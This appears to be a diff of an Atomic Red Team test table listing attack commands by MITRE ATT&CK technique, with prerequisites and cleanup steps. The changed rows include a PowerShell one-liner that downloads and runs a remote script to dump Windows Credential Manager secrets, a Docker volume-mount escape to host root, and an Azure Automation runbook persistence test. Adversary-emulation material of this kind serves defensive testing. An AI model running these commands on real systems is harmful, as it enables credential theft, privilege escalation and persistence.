$buffer.Length) | | | | | | | input_arguments.volume.type: string | @@ -3826,8 +3905,8 @@ | | | | | | | | | | | | | | | } catch { exit 1 } | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | dependencies.0.get_prereq_command: Write-Host "You will need to install Microsoft Word manually to meet this requirement" | | -| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] | c89becbe-1758-4e7d-a0f4-97d2188a23e3 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force | powershell | 0 | nan | nan | nan | nan | nan | -| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [web Credentials] | 8fd5a296-6772-4766-9991-ff4e92af7240 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force | powershell | 0 | nan | nan | nan | nan | nan | +| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] | c89becbe-1758-4e7d-a0f4-97d2188a23e3 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force | powershell | 0 | nan | nan | nan | nan | nan | +| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [web Credentials] | 8fd5a296-6772-4766-9991-ff4e92af7240 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force | powershell | 0 | nan | nan | nan | nan | nan | | T1555 | Credentials from Password Stores | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] | 36753ded-e5c4-4eb5-bc3c-e8fba236878d | This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe | windows | nan | nan | vaultcmd /listcreds:"Windows Credentials" /all | powershell | 0 | nan | nan | nan | nan | nan | | T1555 | Credentials from Password Stores | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] | bc071188-459f-44d5-901a-f8f2625b2d2e | This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe | windows | nan | nan | vaultcmd /listcreds:"Web Credentials" /all | powershell | 0 | nan | nan | nan | nan | nan | | T1555 | Credentials from Password Stores | WinPwn - Loot local Credentials - lazagne | 079ee2e9-6f16-47ca-a635-14efcd994118 | The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. | windows | nan | nan | $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' | powershell | nan | nan | nan | nan | nan | nan | @@ -6892,6 +6971,19 @@ | | | | | | | | | | | | | | | | input_arguments.listen_port.type: integer | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | input_arguments.listen_port.default: 4444 | +| T1611 | Escape to Host | Privilege Escalation via Docker Volume Mapping | 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 | This test demonstrates privilege escalation by abusing Docker's volume mapping | containers | nan | nan | echo "Current user: #{username}" | sh | 1 | nan | USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete." | nan | dependencies.0.description: Docker | input_arguments.username.default: docker_user | +| | | | | feature to gain access to the host file system. By mounting the root directory | | | | sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id" | | | | | | dependencies.0.prereq_command: command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; } | | +| | | | | of the host into a Docker container, the attacker can use chroot to operate as | | | | | | | | | | | input_arguments.username.description: Username that run attack command | +| | | | | root on the host system. | | | | | | | | | | dependencies.0.get_prereq_command: echo "You should install docker manually." | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | dependencies.1.description: Docker Privileged User | | +| | | | | | | | | | | | | | | dependencies.1.prereq_command: sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker" | | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.1.get_prereq_command: USERNAME="#{username}" | | +| | | | | | | | | | | | | | | PASSWORD="password123" | | +| | | | | | | | | | | | | | | SUDO_COMMAND="/usr/bin/docker" | | +| | | | | | | | | | | | | | | SUDOERS_FILE="/etc/sudoers.d/$USERNAME" | | +| | | | | | | | | | | | | | | [[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD" | | | T1001.002 | Data Obfuscation via Steganography | Steganographic Tarball Embedding | c7921449-8b62-4c4d-8a83-d9281ac0190b | This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) | windows | nan | nan | Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte | powershell | 1 | nan | Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore | powershell | dependencies.0.description: Image file must exist | input_arguments.image_file.description: Image file which will be downloaded to be used to hide data | | | | | | within an image. | | | | | | | | Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore | | | | | | | | | | | | | | | | | | | dependencies.0.prereq_command: if (!(Test-Path "#{image_file}")) {exit 1} else { | input_arguments.image_file.type: path | @@ -10811,35 +10903,39 @@ | | | | | | | | | | | | | | | | input_arguments.output-key-file.type: string | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | input_arguments.output-key-file.default: gcp-art-service-account-1.json | -| T1078.004 | Valid Accounts: Cloud Accounts | Azure Persistence Automation Runbook Created or Modified | 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac | Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure | iaas:azure | nan | nan | $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force | powershell | 0 | nan | Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force | powershell | dependencies.0.description: Check if terraform is installed. | input_arguments.username.description: Azure username | -| | | | | Automation runbook to execute malicious code and maintain persistence in their target's environment. | | | | $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd | | | | cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | | | -| | | | | | | | | Connect-AzAccount -Credential $creds | | | | terraform destroy -auto-approve | | dependencies.0.prereq_command: terraform version | input_arguments.username.type: string | -| | | | | | | | | New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} | | | | | | | | -| | | | | | | | | | | | | | | dependencies.0.get_prereq_command: echo Please install terraform. | input_arguments.username.default: None | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.1.description: Install-Module -Name Az | input_arguments.password.description: Azure password | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.1.prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} | input_arguments.password.type: string | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.1.get_prereq_command: Install-Module -Name Az -Scope CurrentUser -Force | input_arguments.password.default: None | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.2.description: Check if the user is logged into Azure. | input_arguments.resource_group.description: Name of the resource group | +| T1078.004 | Valid Accounts: Cloud Accounts | Azure Persistence Automation Runbook Created or Modified | 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac | Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure | iaas:azure | nan | nan | New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} | powershell | 0 | nan | Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force | powershell | dependencies.0.description: Check if terraform is installed. | input_arguments.resource_group.description: Name of the resource group | +| | | | | Automation runbook to execute malicious code and maintain persistence in their target's environment. | | | | | | | | Remove-AzAutomationAccount -ResourceGroupName #{resource_group} -Name #{automation_account_name} -Force | | | | +| | | | | | | | | | | | | Remove-AzResourceGroup -Name #{resource_group} -Force | | dependencies.0.prereq_command: terraform version | input_arguments.resource_group.type: string | +| | | | | | | | | | | | | echo "Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted." | | | | +| | | | | | | | | | | | | cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | dependencies.0.get_prereq_command: echo "Please install terraform via https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli (URL accurate as of Nov. 15, 2024)." | input_arguments.resource_group.default: ART-ResourceGroupName-T1078-004 | +| | | | | | | | | | | | | terraform destroy -auto-approve | | | | +| | | | | | | | | | | | | | | dependencies.1.description: Check if Azure CLI and Azure Powershell are installed. | input_arguments.runbook_name.description: Name of the runbook name | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | * Login to Azure CLI with "az login", and login to Azure Powershell with "Connect-AzAccount". Sessions are not shared. | input_arguments.runbook_name.type: string | +| | | | | | | | | | | | | | | * Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI. | | +| | | | | | | | | | | | | | | | input_arguments.runbook_name.default: ART-RunbookName-T1078-004 | +| | | | | | | | | | | | | | | dependencies.1.prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} | | +| | | | | | | | | | | | | | | | input_arguments.automation_account_name.description: Name of the automation account name | +| | | | | | | | | | | | | | | dependencies.1.get_prereq_command: $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindowsx64 -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi | | +| | | | | | | | | | | | | | | | input_arguments.automation_account_name.type: string | +| | | | | | | | | | | | | | | dependencies.2.description: Check if the user is logged into Azure. | | +| | | | | | | | | | | | | | | | input_arguments.automation_account_name.default: ART-AutomationAccountName-T1078-004 | +| | | | | | | | | | | | | | | dependencies.2.prereq_command: try {if (-not (Get-AzContext)) { exit 1 } else { exit 0 }} catch {exit 1} | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.2.prereq_command: az account show | input_arguments.resource_group.type: string | +| | | | | | | | | | | | | | | dependencies.2.get_prereq_command: echo "* Configure your Azure account using: Connect-AzAccount" | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.2.get_prereq_command: echo Configure your Azure account using: az login. | input_arguments.resource_group.default: None | +| | | | | | | | | | | | | | | dependencies.3.description: Create dependency resources using terraform | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.3.description: Create dependency resources using terraform | input_arguments.runbook_name.description: Name of the runbook name | +| | | | | | | | | | | | | | | * If fail to meet prereq, navigate to T1078.004-2 using "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | +| | | | | | | | | | | | | | | * Open the "terraform.tfvars" file and fill in the variables with your desired values. | | +| | | | | | | | | | | | | | | * Re-run -GetPrereqs | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.3.prereq_command: try {if (Test-Path "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} | input_arguments.runbook_name.type: string | +| | | | | | | | | | | | | | | dependencies.3.prereq_command: try {if (Test-Path "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.3.get_prereq_command: cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | input_arguments.runbook_name.default: None | +| | | | | | | | | | | | | | | dependencies.3.get_prereq_command: echo "Navigating to: $PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | +| | | | | | | | | | | | | | | cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | | | | | | | | | | | | | | | | terraform init | | -| | | | | | | | | | | | | | | terraform apply -auto-approve | input_arguments.automation_account_name.description: Name of the automation account name | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | | input_arguments.automation_account_name.type: string | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | | input_arguments.automation_account_name.default: None | +| | | | | | | | | | | | | | | terraform apply -auto-approve | | | T1078.004 | Valid Accounts: Cloud Accounts | GCP - Create Custom IAM Role | 3a159042-69e6-4398-9a69-3308a4841c85 | This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team. | iaas:gcp | nan | nan | gcloud config set project #{project-id} | sh | 0 | nan | gcloud iam roles delete #{role-name} --project=#{project-id} | sh | dependencies.0.description: Requires gcloud | input_arguments.project-id.description: ID of the GCP Project you to execute the command against. | | | | | | | | | | gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id} | | | | | | | | | | | | | Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP). | | | | | | | | | | dependencies.0.prereq_command: if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; | input_arguments.project-id.type: string |